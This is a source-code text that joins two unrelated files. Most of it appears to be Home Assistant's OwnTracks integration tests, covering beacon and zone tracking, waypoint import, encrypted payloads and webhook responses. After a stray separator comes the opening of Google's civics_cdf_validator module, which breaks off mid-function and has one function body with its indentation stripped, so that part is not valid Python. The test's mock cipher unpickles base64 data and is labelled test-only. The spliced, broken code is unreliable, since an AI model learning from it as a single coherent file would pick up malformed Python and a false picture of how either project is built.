async def test_event_beacon_unknown_zone(hass, context):
    """Test the event for unknown zone."""
    # A beacon which does not match a HA zone is the
    # definition of a mobile beacon. In this case, "unknown"
    # will be turned into device_tracker.beacon_unknown and
    # that will be tracked at my current location. First I
    # set my location so that my state is 'outer'
    await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE)
    assert_location_state(hass, "outer")
    message = build_message({"desc": "unknown"}, REGION_BEACON_ENTER_MESSAGE)
    await send_message(hass, EVENT_TOPIC, message)
    # My state is still outer and now the unknown beacon
    # has joined me at outer.
    assert_location_state(hass, "outer")
    assert_mobile_tracker_state(hass, "outer", "unknown")


async def test_event_beacon_entry_zone_loading_dash(hass, context):
    """Test the event for beacon zone landing."""
    # Make sure the leading - is ignored
    # Owntracks uses this to switch on hold
    message = build_message({"desc": "-inner"}, REGION_BEACON_ENTER_MESSAGE)
    await send_message(hass, EVENT_TOPIC, message)
    assert_location_state(hass, "inner")
# ------------------------------------------------------------------------
# Mobile Beacon based event entry / exit testing
async def test_mobile_enter_move_beacon(hass, context):
    """Test the movement of a beacon."""
    # I am in the outer zone.
    await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE)
    # I see the 'keys' beacon. I set the location of the
    # beacon_keys tracker to my current device location.
    await send_message(hass, EVENT_TOPIC, MOBILE_BEACON_ENTER_EVENT_MESSAGE)
    assert_mobile_tracker_latitude(hass, LOCATION_MESSAGE["lat"])
    assert_mobile_tracker_state(hass, "outer")
    # Location update to outside of defined zones.
    # I am now 'not home' and neither are my keys.
    # The beacon tracker follows the device's GPS while "seen".
    await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE_NOT_HOME)
    assert_location_state(hass, STATE_NOT_HOME)
    assert_mobile_tracker_state(hass, STATE_NOT_HOME)
    not_home_lat = LOCATION_MESSAGE_NOT_HOME["lat"]
    assert_location_latitude(hass, not_home_lat)
    assert_mobile_tracker_latitude(hass, not_home_lat)
async def test_mobile_enter_exit_region_beacon(hass, context):
    """Test the enter and the exit of a mobile beacon."""
    # I am in the outer zone.
    await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE)
    # I see a new mobile beacon
    await send_message(hass, EVENT_TOPIC, MOBILE_BEACON_ENTER_EVENT_MESSAGE)
    assert_mobile_tracker_latitude(hass, OUTER_ZONE["latitude"])
    assert_mobile_tracker_state(hass, "outer")
    # GPS enter message should move beacon
    # (the beacon is pinned to the device, so it enters the inner zone too).
    await send_message(hass, EVENT_TOPIC, REGION_GPS_ENTER_MESSAGE)
    assert_mobile_tracker_latitude(hass, INNER_ZONE["latitude"])
    assert_mobile_tracker_state(hass, REGION_GPS_ENTER_MESSAGE["desc"])
    # Exit inner zone to outer zone should move beacon to
    # center of outer zone
    await send_message(hass, EVENT_TOPIC, REGION_GPS_LEAVE_MESSAGE)
    assert_mobile_tracker_latitude(hass, REGION_GPS_LEAVE_MESSAGE["lat"])
    assert_mobile_tracker_state(hass, "outer")
async def test_mobile_exit_move_beacon(hass, context):
    """Test the exit move of a beacon."""
    # I am in the outer zone.
    await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE)
    # I see a new mobile beacon
    await send_message(hass, EVENT_TOPIC, MOBILE_BEACON_ENTER_EVENT_MESSAGE)
    assert_mobile_tracker_latitude(hass, OUTER_ZONE["latitude"])
    assert_mobile_tracker_state(hass, "outer")
    # Exit mobile beacon, should set location
    await send_message(hass, EVENT_TOPIC, MOBILE_BEACON_LEAVE_EVENT_MESSAGE)
    assert_mobile_tracker_latitude(hass, OUTER_ZONE["latitude"])
    assert_mobile_tracker_state(hass, "outer")
    # Move after exit should do nothing
    # (the beacon is no longer attached to the device, so the device's
    # movement must not drag the beacon tracker along).
    await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE_NOT_HOME)
    assert_mobile_tracker_latitude(hass, OUTER_ZONE["latitude"])
    assert_mobile_tracker_state(hass, "outer")
async def test_mobile_multiple_async_enter_exit(hass, context):
    """Test the multiple entering."""
    # Fire a rapid enter/leave/enter burst many times without awaiting,
    # to provoke any race condition in the beacon bookkeeping.
    burst = (
        MOBILE_BEACON_ENTER_EVENT_MESSAGE,
        MOBILE_BEACON_LEAVE_EVENT_MESSAGE,
        MOBILE_BEACON_ENTER_EVENT_MESSAGE,
    )
    for _ in range(20):
        for event in burst:
            async_fire_mqtt_message(hass, EVENT_TOPIC, json.dumps(event))
    await hass.async_block_till_done()
    # After the dust settles a single leave must empty the set of
    # active beacons for the device.
    await send_message(hass, EVENT_TOPIC, MOBILE_BEACON_LEAVE_EVENT_MESSAGE)
    assert len(context().mobile_beacons_active["greg_phone"]) == 0
async def test_mobile_multiple_enter_exit(hass, context):
    """Test the multiple entering."""
    # Two enters followed by a single leave must still clear the beacon
    # from the active set (enters must not be double-counted).
    await send_message(hass, EVENT_TOPIC, MOBILE_BEACON_ENTER_EVENT_MESSAGE)
    await send_message(hass, EVENT_TOPIC, MOBILE_BEACON_ENTER_EVENT_MESSAGE)
    await send_message(hass, EVENT_TOPIC, MOBILE_BEACON_LEAVE_EVENT_MESSAGE)
    assert len(context().mobile_beacons_active["greg_phone"]) == 0
async def test_complex_movement(hass, context):
    """Test a complex sequence representative of real-world use.

    Interleaves GPS location updates, region (zone) enter/leave events
    and mobile beacon enter/leave events in the order OwnTracks actually
    publishes them, asserting the device and beacon trackers stay in sync.
    """
    # I am in the outer zone.
    await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE)
    assert_location_state(hass, "outer")
    # gps to inner location and event, as actually happens with OwnTracks
    location_message = build_message(
        {
            "lat": REGION_GPS_ENTER_MESSAGE["lat"],
            "lon": REGION_GPS_ENTER_MESSAGE["lon"],
        },
        LOCATION_MESSAGE,
    )
    await send_message(hass, LOCATION_TOPIC, location_message)
    await send_message(hass, EVENT_TOPIC, REGION_GPS_ENTER_MESSAGE)
    assert_location_latitude(hass, INNER_ZONE["latitude"])
    assert_location_state(hass, "inner")
    # region beacon enter inner event and location as actually happens
    # with OwnTracks
    location_message = build_message(
        {
            "lat": location_message["lat"] + FIVE_M,
            "lon": location_message["lon"] + FIVE_M,
        },
        LOCATION_MESSAGE,
    )
    await send_message(hass, EVENT_TOPIC, REGION_BEACON_ENTER_MESSAGE)
    await send_message(hass, LOCATION_TOPIC, location_message)
    assert_location_latitude(hass, INNER_ZONE["latitude"])
    assert_location_state(hass, "inner")
    # see keys mobile beacon and location message as actually happens
    location_message = build_message(
        {
            "lat": location_message["lat"] + FIVE_M,
            "lon": location_message["lon"] + FIVE_M,
        },
        LOCATION_MESSAGE,
    )
    await send_message(hass, EVENT_TOPIC, MOBILE_BEACON_ENTER_EVENT_MESSAGE)
    await send_message(hass, LOCATION_TOPIC, location_message)
    assert_location_latitude(hass, INNER_ZONE["latitude"])
    assert_mobile_tracker_latitude(hass, INNER_ZONE["latitude"])
    assert_location_state(hass, "inner")
    assert_mobile_tracker_state(hass, "inner")
    # Slightly odd, I leave the location by gps before I lose
    # sight of the region beacon. This is also a little odd in
    # that my GPS coords are now in the 'outer' zone but I did not
    # "enter" that zone when I started up so my location is not
    # the center of OUTER_ZONE, but rather just my GPS location.
    # gps out of inner event and location
    location_message = build_message(
        {
            "lat": REGION_GPS_LEAVE_MESSAGE["lat"],
            "lon": REGION_GPS_LEAVE_MESSAGE["lon"],
        },
        LOCATION_MESSAGE,
    )
    await send_message(hass, EVENT_TOPIC, REGION_GPS_LEAVE_MESSAGE)
    await send_message(hass, LOCATION_TOPIC, location_message)
    assert_location_latitude(hass, REGION_GPS_LEAVE_MESSAGE["lat"])
    assert_mobile_tracker_latitude(hass, REGION_GPS_LEAVE_MESSAGE["lat"])
    assert_location_state(hass, "outer")
    assert_mobile_tracker_state(hass, "outer")
    # region beacon leave inner
    location_message = build_message(
        {
            "lat": location_message["lat"] - FIVE_M,
            "lon": location_message["lon"] - FIVE_M,
        },
        LOCATION_MESSAGE,
    )
    await send_message(hass, EVENT_TOPIC, REGION_BEACON_LEAVE_MESSAGE)
    await send_message(hass, LOCATION_TOPIC, location_message)
    assert_location_latitude(hass, location_message["lat"])
    assert_mobile_tracker_latitude(hass, location_message["lat"])
    assert_location_state(hass, "outer")
    assert_mobile_tracker_state(hass, "outer")
    # lose keys mobile beacon
    lost_keys_location_message = build_message(
        {
            "lat": location_message["lat"] - FIVE_M,
            "lon": location_message["lon"] - FIVE_M,
        },
        LOCATION_MESSAGE,
    )
    await send_message(hass, LOCATION_TOPIC, lost_keys_location_message)
    await send_message(hass, EVENT_TOPIC, MOBILE_BEACON_LEAVE_EVENT_MESSAGE)
    assert_location_latitude(hass, lost_keys_location_message["lat"])
    assert_mobile_tracker_latitude(hass, lost_keys_location_message["lat"])
    assert_location_state(hass, "outer")
    assert_mobile_tracker_state(hass, "outer")
    # gps leave outer
    await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE_NOT_HOME)
    await send_message(hass, EVENT_TOPIC, REGION_GPS_LEAVE_MESSAGE_OUTER)
    assert_location_latitude(hass, LOCATION_MESSAGE_NOT_HOME["lat"])
    # The keys were dropped earlier, so they stay where they were lost.
    assert_mobile_tracker_latitude(hass, lost_keys_location_message["lat"])
    assert_location_state(hass, "not_home")
    assert_mobile_tracker_state(hass, "outer")
    # location move not home
    location_message = build_message(
        {
            "lat": LOCATION_MESSAGE_NOT_HOME["lat"] - FIVE_M,
            "lon": LOCATION_MESSAGE_NOT_HOME["lon"] - FIVE_M,
        },
        LOCATION_MESSAGE_NOT_HOME,
    )
    await send_message(hass, LOCATION_TOPIC, location_message)
    assert_location_latitude(hass, location_message["lat"])
    assert_mobile_tracker_latitude(hass, lost_keys_location_message["lat"])
    assert_location_state(hass, "not_home")
    assert_mobile_tracker_state(hass, "outer")
async def test_complex_movement_sticky_keys_beacon(hass, context):
    """Test a complex sequence which was previously broken.

    Regression test: the keys beacon used to keep following greg_phone
    around even after OwnTracks sent a mobile beacon 'leave' event.
    """
    # I am in the outer zone.
    await send_message(hass, LOCATION_TOPIC, LOCATION_MESSAGE)
    assert_location_state(hass, "outer")
    # gps to inner location and event, as actually happens with OwnTracks
    location_message = build_message(
        {
            "lat": REGION_GPS_ENTER_MESSAGE["lat"],
            "lon": REGION_GPS_ENTER_MESSAGE["lon"],
        },
        LOCATION_MESSAGE,
    )
    await send_message(hass, LOCATION_TOPIC, location_message)
    await send_message(hass, EVENT_TOPIC, REGION_GPS_ENTER_MESSAGE)
    assert_location_latitude(hass, INNER_ZONE["latitude"])
    assert_location_state(hass, "inner")
    # see keys mobile beacon and location message as actually happens
    location_message = build_message(
        {
            "lat": location_message["lat"] + FIVE_M,
            "lon": location_message["lon"] + FIVE_M,
        },
        LOCATION_MESSAGE,
    )
    await send_message(hass, EVENT_TOPIC, MOBILE_BEACON_ENTER_EVENT_MESSAGE)
    await send_message(hass, LOCATION_TOPIC, location_message)
    assert_location_latitude(hass, INNER_ZONE["latitude"])
    assert_mobile_tracker_latitude(hass, INNER_ZONE["latitude"])
    assert_location_state(hass, "inner")
    assert_mobile_tracker_state(hass, "inner")
    # region beacon enter inner event and location as actually happens
    # with OwnTracks
    location_message = build_message(
        {
            "lat": location_message["lat"] + FIVE_M,
            "lon": location_message["lon"] + FIVE_M,
        },
        LOCATION_MESSAGE,
    )
    await send_message(hass, EVENT_TOPIC, REGION_BEACON_ENTER_MESSAGE)
    await send_message(hass, LOCATION_TOPIC, location_message)
    assert_location_latitude(hass, INNER_ZONE["latitude"])
    assert_location_state(hass, "inner")
    # This sequence of moves would cause keys to follow
    # greg_phone around even after the OwnTracks sent
    # a mobile beacon 'leave' event for the keys.
    # leave keys
    await send_message(hass, LOCATION_TOPIC, location_message)
    await send_message(hass, EVENT_TOPIC, MOBILE_BEACON_LEAVE_EVENT_MESSAGE)
    assert_location_latitude(hass, INNER_ZONE["latitude"])
    assert_location_state(hass, "inner")
    assert_mobile_tracker_state(hass, "inner")
    assert_mobile_tracker_latitude(hass, INNER_ZONE["latitude"])
    # leave inner region beacon
    await send_message(hass, EVENT_TOPIC, REGION_BEACON_LEAVE_MESSAGE)
    await send_message(hass, LOCATION_TOPIC, location_message)
    assert_location_state(hass, "inner")
    assert_mobile_tracker_state(hass, "inner")
    assert_mobile_tracker_latitude(hass, INNER_ZONE["latitude"])
    # enter inner region beacon
    await send_message(hass, EVENT_TOPIC, REGION_BEACON_ENTER_MESSAGE)
    await send_message(hass, LOCATION_TOPIC, location_message)
    assert_location_latitude(hass, INNER_ZONE["latitude"])
    assert_location_state(hass, "inner")
    assert_mobile_tracker_state(hass, "inner")
    assert_mobile_tracker_latitude(hass, INNER_ZONE["latitude"])
    # enter keys
    await send_message(hass, EVENT_TOPIC, MOBILE_BEACON_ENTER_EVENT_MESSAGE)
    await send_message(hass, LOCATION_TOPIC, location_message)
    assert_location_state(hass, "inner")
    assert_mobile_tracker_state(hass, "inner")
    assert_mobile_tracker_latitude(hass, INNER_ZONE["latitude"])
    # leave keys
    await send_message(hass, LOCATION_TOPIC, location_message)
    await send_message(hass, EVENT_TOPIC, MOBILE_BEACON_LEAVE_EVENT_MESSAGE)
    assert_location_state(hass, "inner")
    assert_mobile_tracker_state(hass, "inner")
    assert_mobile_tracker_latitude(hass, INNER_ZONE["latitude"])
    # leave inner region beacon
    await send_message(hass, EVENT_TOPIC, REGION_BEACON_LEAVE_MESSAGE)
    await send_message(hass, LOCATION_TOPIC, location_message)
    assert_location_state(hass, "inner")
    assert_mobile_tracker_state(hass, "inner")
    assert_mobile_tracker_latitude(hass, INNER_ZONE["latitude"])
    # GPS leave inner region, I'm in the 'outer' region now
    # but on GPS coords
    leave_location_message = build_message(
        {
            "lat": REGION_GPS_LEAVE_MESSAGE["lat"],
            "lon": REGION_GPS_LEAVE_MESSAGE["lon"],
        },
        LOCATION_MESSAGE,
    )
    await send_message(hass, EVENT_TOPIC, REGION_GPS_LEAVE_MESSAGE)
    await send_message(hass, LOCATION_TOPIC, leave_location_message)
    assert_location_state(hass, "outer")
    # The keys were left behind in 'inner' and must not follow the phone.
    assert_mobile_tracker_state(hass, "inner")
    assert_location_latitude(hass, REGION_GPS_LEAVE_MESSAGE["lat"])
    assert_mobile_tracker_latitude(hass, INNER_ZONE["latitude"])
async def test_waypoint_import_simple(hass, context):
    """Test a simple import of list of waypoints."""
    await send_message(hass, WAYPOINTS_TOPIC, WAYPOINTS_EXPORTED_MESSAGE.copy())
    # Both exported waypoints should now exist as states.
    for entity_id in (WAYPOINT_ENTITY_NAMES[0], WAYPOINT_ENTITY_NAMES[1]):
        assert hass.states.get(entity_id) is not None
async def test_waypoint_import_block(hass, context):
    """Test import of list of waypoints for blocked user."""
    await send_message(hass, WAYPOINTS_TOPIC_BLOCKED, WAYPOINTS_EXPORTED_MESSAGE.copy())
    # The blocked user's waypoints must not be imported as states.
    for entity_id in (WAYPOINT_ENTITY_NAMES[2], WAYPOINT_ENTITY_NAMES[3]):
        assert hass.states.get(entity_id) is None
async def test_waypoint_import_no_whitelist(hass, setup_comp):
    """Test import of list of waypoints with no whitelist set."""
    await setup_owntracks(
        hass,
        {
            CONF_MAX_GPS_ACCURACY: 200,
            CONF_WAYPOINT_IMPORT: True,
            CONF_MQTT_TOPIC: "owntracks/#",
        },
    )
    await send_message(hass, WAYPOINTS_TOPIC_BLOCKED, WAYPOINTS_EXPORTED_MESSAGE.copy())
    # With no whitelist configured, even this user's waypoints import.
    for entity_id in (WAYPOINT_ENTITY_NAMES[2], WAYPOINT_ENTITY_NAMES[3]):
        assert hass.states.get(entity_id) is not None
async def test_waypoint_import_bad_json(hass, context):
    """Test importing a bad JSON payload."""
    # The final True asks send_message to corrupt the payload.
    await send_message(hass, WAYPOINTS_TOPIC, WAYPOINTS_EXPORTED_MESSAGE.copy(), True)
    # A corrupt payload must not create any waypoint entities.
    for entity_id in (WAYPOINT_ENTITY_NAMES[2], WAYPOINT_ENTITY_NAMES[3]):
        assert hass.states.get(entity_id) is None
async def test_waypoint_import_existing(hass, context):
    """Test importing a zone that exists."""
    waypoints_message = WAYPOINTS_EXPORTED_MESSAGE.copy()
    await send_message(hass, WAYPOINTS_TOPIC, waypoints_message)
    # Get the first waypoint exported
    wayp = hass.states.get(WAYPOINT_ENTITY_NAMES[0])
    # Send an update
    waypoints_message = WAYPOINTS_UPDATED_MESSAGE.copy()
    await send_message(hass, WAYPOINTS_TOPIC, waypoints_message)
    new_wayp = hass.states.get(WAYPOINT_ENTITY_NAMES[0])
    # An update for an already-imported waypoint leaves the state unchanged.
    assert wayp == new_wayp
async def test_single_waypoint_import(hass, context):
    """Test single waypoint message."""
    # A lone waypoint message (not a list export) should also import.
    waypoint_message = WAYPOINT_MESSAGE.copy()
    await send_message(hass, WAYPOINT_TOPIC, waypoint_message)
    wayp = hass.states.get(WAYPOINT_ENTITY_NAMES[0])
    assert wayp is not None
async def test_not_implemented_message(hass, context):
    """Handle not implemented message type."""
    # Use the patch as a context manager so it is undone even when the
    # assertion fails; a bare start()/stop() pair leaks the patch into
    # subsequent tests on failure.
    with patch(
        "homeassistant.components.owntracks.messages.async_handle_not_impl_msg",
        return_value=mock_coro(False),
    ):
        assert not await send_message(hass, LWT_TOPIC, LWT_MESSAGE)
async def test_unsupported_message(hass, context):
    """Handle an unsupported message type."""
    # Use the patch as a context manager so it is undone even when the
    # assertion fails; a bare start()/stop() pair leaks the patch into
    # subsequent tests on failure.
    with patch(
        "homeassistant.components.owntracks.messages.async_handle_unsupported_msg",
        return_value=mock_coro(False),
    ):
        assert not await send_message(hass, BAD_TOPIC, BAD_MESSAGE)
def generate_ciphers(secret):
    """Generate test ciphers for the DEFAULT_LOCATION_MESSAGE.

    Returns a tuple (ctxt, mctxt):
    - ctxt: real libsodium ciphertext, or "" if PyNaCl is unavailable.
    - mctxt: a pickle-based stand-in decrypted by the mock cipher.
    """
    # PyNaCl ciphertext generation will fail if the module
    # cannot be imported. However, the test for decryption
    # also relies on this library and won't be run without it.
    import pickle
    import base64
    try:
        from nacl.secret import SecretBox
        from nacl.encoding import Base64Encoder
        # Derive a fixed-size key: truncate then NUL-pad the secret.
        keylen = SecretBox.KEY_SIZE
        key = secret.encode("utf-8")
        key = key[:keylen]
        key = key.ljust(keylen, b"\0")
        msg = json.dumps(DEFAULT_LOCATION_MESSAGE).encode("utf-8")
        ctxt = SecretBox(key).encrypt(msg, encoder=Base64Encoder).decode("utf-8")
    except (ImportError, OSError):
        ctxt = ""
    # Mock "ciphertext": a base64-encoded pickle of (key, plaintext).
    # Test-only; pickle is not a cipher and must never see untrusted input.
    mctxt = base64.b64encode(
        pickle.dumps(
            (
                secret.encode("utf-8"),
                json.dumps(DEFAULT_LOCATION_MESSAGE).encode("utf-8"),
            )
        )
    ).decode("utf-8")
    return ctxt, mctxt
# Shared secret used for both the real and the mock encrypted payloads.
TEST_SECRET_KEY = "s3cretkey"
CIPHERTEXT, MOCK_CIPHERTEXT = generate_ciphers(TEST_SECRET_KEY)
ENCRYPTED_LOCATION_MESSAGE = {
    # Encrypted version of LOCATION_MESSAGE using libsodium and TEST_SECRET_KEY
    "_type": "encrypted",
    "data": CIPHERTEXT,
}
MOCK_ENCRYPTED_LOCATION_MESSAGE = {
    # Mock-encrypted version of LOCATION_MESSAGE using pickle
    "_type": "encrypted",
    "data": MOCK_CIPHERTEXT,
}
def mock_cipher():
    """Return a dummy pickle-based cipher."""
    def mock_decrypt(ciphertext, key):
        """Unpickle the (key, plaintext) pair and verify the key matches."""
        import base64
        import pickle
        expected_key, payload = pickle.loads(base64.b64decode(ciphertext))
        if key != expected_key:
            raise ValueError()
        return payload
    # The cipher interface is (key length, decrypt callable).
    return len(TEST_SECRET_KEY), mock_decrypt
@pytest.fixture
def config_context(hass, setup_comp):
    """Set up the mocked context.

    Patches device-tracker config load/save for the duration of the test.
    """
    patch_load = patch(
        "homeassistant.components.device_tracker.async_load_config",
        return_value=mock_coro([]),
    )
    patch_save = patch(
        "homeassistant.components.device_tracker.DeviceTracker.async_update_config"
    )
    # Context managers guarantee the patches are removed even if the test
    # using this fixture raises; start()/stop() pairs would leak them.
    with patch_load, patch_save:
        yield
@pytest.fixture(name="not_supports_encryption")
def mock_not_supports_encryption():
    """Mock an unsuccessful nacl import (encryption unsupported)."""
    with patch(
        "homeassistant.components.owntracks.messages.supports_encryption",
        return_value=False,
    ):
        yield
@pytest.fixture(name="get_cipher_error")
def mock_get_cipher_error():
    """Mock an unsuccessful cipher lookup (get_cipher raises OSError)."""
    with patch(
        "homeassistant.components.owntracks.messages.get_cipher", side_effect=OSError()
    ):
        yield
@patch("homeassistant.components.owntracks.messages.get_cipher", mock_cipher)
async def test_encrypted_payload(hass, setup_comp):
    """Test encrypted payload."""
    # With the correct secret the payload decrypts to LOCATION_MESSAGE.
    await setup_owntracks(hass, {CONF_SECRET: TEST_SECRET_KEY})
    await send_message(hass, LOCATION_TOPIC, MOCK_ENCRYPTED_LOCATION_MESSAGE)
    assert_location_latitude(hass, LOCATION_MESSAGE["lat"])
@patch("homeassistant.components.owntracks.messages.get_cipher", mock_cipher)
async def test_encrypted_payload_topic_key(hass, setup_comp):
    """Test encrypted payload with a topic key."""
    # The secret may also be a mapping of topic -> key.
    await setup_owntracks(hass, {CONF_SECRET: {LOCATION_TOPIC: TEST_SECRET_KEY}})
    await send_message(hass, LOCATION_TOPIC, MOCK_ENCRYPTED_LOCATION_MESSAGE)
    assert_location_latitude(hass, LOCATION_MESSAGE["lat"])
async def test_encrypted_payload_not_supports_encryption(
    hass, setup_comp, not_supports_encryption
):
    """Test encrypted payload with no supported encryption."""
    await setup_owntracks(hass, {CONF_SECRET: TEST_SECRET_KEY})
    await send_message(hass, LOCATION_TOPIC, MOCK_ENCRYPTED_LOCATION_MESSAGE)
    # The message is dropped, so no tracker state is created.
    assert hass.states.get(DEVICE_TRACKER_STATE) is None
async def test_encrypted_payload_get_cipher_error(hass, setup_comp, get_cipher_error):
    """Test encrypted payload when the cipher cannot be loaded."""
    await setup_owntracks(hass, {CONF_SECRET: TEST_SECRET_KEY})
    await send_message(hass, LOCATION_TOPIC, MOCK_ENCRYPTED_LOCATION_MESSAGE)
    # The message is dropped, so no tracker state is created.
    assert hass.states.get(DEVICE_TRACKER_STATE) is None
@patch("homeassistant.components.owntracks.messages.get_cipher", mock_cipher)
async def test_encrypted_payload_no_key(hass, setup_comp):
    """Test encrypted payload with no key."""
    assert hass.states.get(DEVICE_TRACKER_STATE) is None
    # An empty secret mapping means no key is available for any topic.
    await setup_owntracks(hass, {CONF_SECRET: {}})
    await send_message(hass, LOCATION_TOPIC, MOCK_ENCRYPTED_LOCATION_MESSAGE)
    assert hass.states.get(DEVICE_TRACKER_STATE) is None
@patch("homeassistant.components.owntracks.messages.get_cipher", mock_cipher)
async def test_encrypted_payload_wrong_key(hass, setup_comp):
    """Test encrypted payload with wrong key."""
    # Decryption fails, so the message is dropped.
    await setup_owntracks(hass, {CONF_SECRET: "wrong key"})
    await send_message(hass, LOCATION_TOPIC, MOCK_ENCRYPTED_LOCATION_MESSAGE)
    assert hass.states.get(DEVICE_TRACKER_STATE) is None
@patch("homeassistant.components.owntracks.messages.get_cipher", mock_cipher)
async def test_encrypted_payload_wrong_topic_key(hass, setup_comp):
    """Test encrypted payload with wrong topic key."""
    # The topic has a key, but it is not the one the payload was built with.
    await setup_owntracks(hass, {CONF_SECRET: {LOCATION_TOPIC: "wrong key"}})
    await send_message(hass, LOCATION_TOPIC, MOCK_ENCRYPTED_LOCATION_MESSAGE)
    assert hass.states.get(DEVICE_TRACKER_STATE) is None
@patch("homeassistant.components.owntracks.messages.get_cipher", mock_cipher)
async def test_encrypted_payload_no_topic_key(hass, setup_comp):
    """Test encrypted payload with no topic key."""
    # A key exists, but only for a different device's topic.
    await setup_owntracks(
        hass, {CONF_SECRET: {"owntracks/{}/{}".format(USER, "otherdevice"): "foobar"}}
    )
    await send_message(hass, LOCATION_TOPIC, MOCK_ENCRYPTED_LOCATION_MESSAGE)
    assert hass.states.get(DEVICE_TRACKER_STATE) is None
async def test_encrypted_payload_libsodium(hass, setup_comp):
    """Test sending encrypted message payload."""
    try:
        import nacl  # noqa: F401 pylint: disable=unused-import
    except (ImportError, OSError):
        # pytest.skip raises, so the old explicit `return` after it was
        # unreachable and has been removed.
        pytest.skip("PyNaCl/libsodium is not installed")
    await setup_owntracks(hass, {CONF_SECRET: TEST_SECRET_KEY})
    await send_message(hass, LOCATION_TOPIC, ENCRYPTED_LOCATION_MESSAGE)
    assert_location_latitude(hass, LOCATION_MESSAGE["lat"])
async def test_customized_mqtt_topic(hass, setup_comp):
    """Test subscribing to a custom mqtt topic."""
    # Messages on the custom topic tree must be handled like the default one.
    await setup_owntracks(hass, {CONF_MQTT_TOPIC: "mytracks/#"})
    topic = f"mytracks/{USER}/{DEVICE}"
    await send_message(hass, topic, LOCATION_MESSAGE)
    assert_location_latitude(hass, LOCATION_MESSAGE["lat"])
async def test_region_mapping(hass, setup_comp):
    """Test region to zone mapping."""
    # An OwnTracks region named "foo" is mapped to HA zone "inner".
    await setup_owntracks(hass, {CONF_REGION_MAPPING: {"foo": "inner"}})
    hass.states.async_set("zone.inner", "zoning", INNER_ZONE)
    message = build_message({"desc": "foo"}, REGION_GPS_ENTER_MESSAGE)
    assert message["desc"] == "foo"
    await send_message(hass, EVENT_TOPIC, message)
    assert_location_state(hass, "inner")
async def test_restore_state(hass, hass_client):
    """Test that we can restore state."""
    entry = MockConfigEntry(
        domain="owntracks", data={"webhook_id": "owntracks_test", "secret": "abcd"}
    )
    entry.add_to_hass(hass)
    await hass.config_entries.async_setup(entry.entry_id)
    await hass.async_block_till_done()
    # Deliver a location via the webhook to create the tracker entity.
    client = await hass_client()
    resp = await client.post(
        "/api/webhook/owntracks_test",
        json=LOCATION_MESSAGE,
        headers={"X-Limit-u": "Paulus", "X-Limit-d": "Pixel"},
    )
    assert resp.status == 200
    await hass.async_block_till_done()
    state_1 = hass.states.get("device_tracker.paulus_pixel")
    assert state_1 is not None
    # Reload the config entry: the entity is recreated, so the state object
    # differs, but its restored contents must match the original.
    await hass.config_entries.async_reload(entry.entry_id)
    await hass.async_block_till_done()
    state_2 = hass.states.get("device_tracker.paulus_pixel")
    assert state_2 is not None
    assert state_1 is not state_2
    assert state_1.state == state_2.state
    assert state_1.name == state_2.name
    assert state_1.attributes["latitude"] == state_2.attributes["latitude"]
    assert state_1.attributes["longitude"] == state_2.attributes["longitude"]
    assert state_1.attributes["battery_level"] == state_2.attributes["battery_level"]
    assert state_1.attributes["source_type"] == state_2.attributes["source_type"]
async def test_returns_empty_friends(hass, hass_client):
    """Test that an empty list of persons' locations is returned."""
    entry = MockConfigEntry(
        domain="owntracks", data={"webhook_id": "owntracks_test", "secret": "abcd"}
    )
    entry.add_to_hass(hass)
    await hass.config_entries.async_setup(entry.entry_id)
    await hass.async_block_till_done()
    client = await hass_client()
    resp = await client.post(
        "/api/webhook/owntracks_test",
        json=LOCATION_MESSAGE,
        headers={"X-Limit-u": "Paulus", "X-Limit-d": "Pixel"},
    )
    assert resp.status == 200
    # No persons are configured, so the friends response is an empty list.
    assert await resp.text() == "[]"
async def test_returns_array_friends(hass, hass_client):
    """Test that a list of persons' current locations is returned."""
    otracks = MockConfigEntry(
        domain="owntracks", data={"webhook_id": "owntracks_test", "secret": "abcd"}
    )
    otracks.add_to_hass(hass)
    await hass.config_entries.async_setup(otracks.entry_id)
    await hass.async_block_till_done()
    # Setup device_trackers
    assert await async_setup_component(
        hass,
        "person",
        {
            "person": [
                {
                    "name": "person 1",
                    "id": "person1",
                    "device_trackers": ["device_tracker.person_1_tracker_1"],
                },
                {
                    "name": "person2",
                    "id": "person2",
                    "device_trackers": ["device_tracker.person_2_tracker_1"],
                },
            ]
        },
    )
    # Only person 1 has a known location; person 2 should not appear.
    hass.states.async_set(
        "device_tracker.person_1_tracker_1", "home", {"latitude": 10, "longitude": 20}
    )
    client = await hass_client()
    resp = await client.post(
        "/api/webhook/owntracks_test",
        json=LOCATION_MESSAGE,
        headers={"X-Limit-u": "Paulus", "X-Limit-d": "Pixel"},
    )
    assert resp.status == 200
    response_json = json.loads(await resp.text())
    # The friends payload carries lat/lon and a two-letter tracker id.
    assert response_json[0]["lat"] == 10
    assert response_json[0]["lon"] == 20
    assert response_json[0]["tid"] == "p1"
| |
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""NIST CDF validation library.
A set of rules that can be used to validate a NIST 1500-100 file containing
election candidate or sitting officeholder data according to the included
XSD and additional higher-level requirements.
See https://developers.google.com/elections-data/reference/
"""
from __future__ import print_function

import argparse
import cProfile
import functools
import hashlib
import io
import os
import pstats
import re

import github

from civics_cdf_validator import base
from civics_cdf_validator import gpunit_rules
from civics_cdf_validator import loggers
from civics_cdf_validator import rules
from civics_cdf_validator import version
def _validate_path(parser, arg):
"""Check that the files provided exist."""
if not os.path.exists(arg):
parser.error("The file path for %s doesn't exist" % arg)
else:
return arg
def _validate_rules(parser, arg):
  """Check that the listed rules exist."""
  known_names = {rule_cls.__name__ for rule_cls in rules.ALL_RULES}
  requested = arg.strip().split(",")
  # Empty entries (e.g. from trailing commas) are tolerated and skipped.
  unknown = [name for name in requested if name and name not in known_names]
  if unknown:
    parser.error("The rule(s) %s do not exist" % ", ".join(unknown))
  else:
    return requested
def _validate_severity(parser, arg):
  """Check that the severity level provided is correct."""
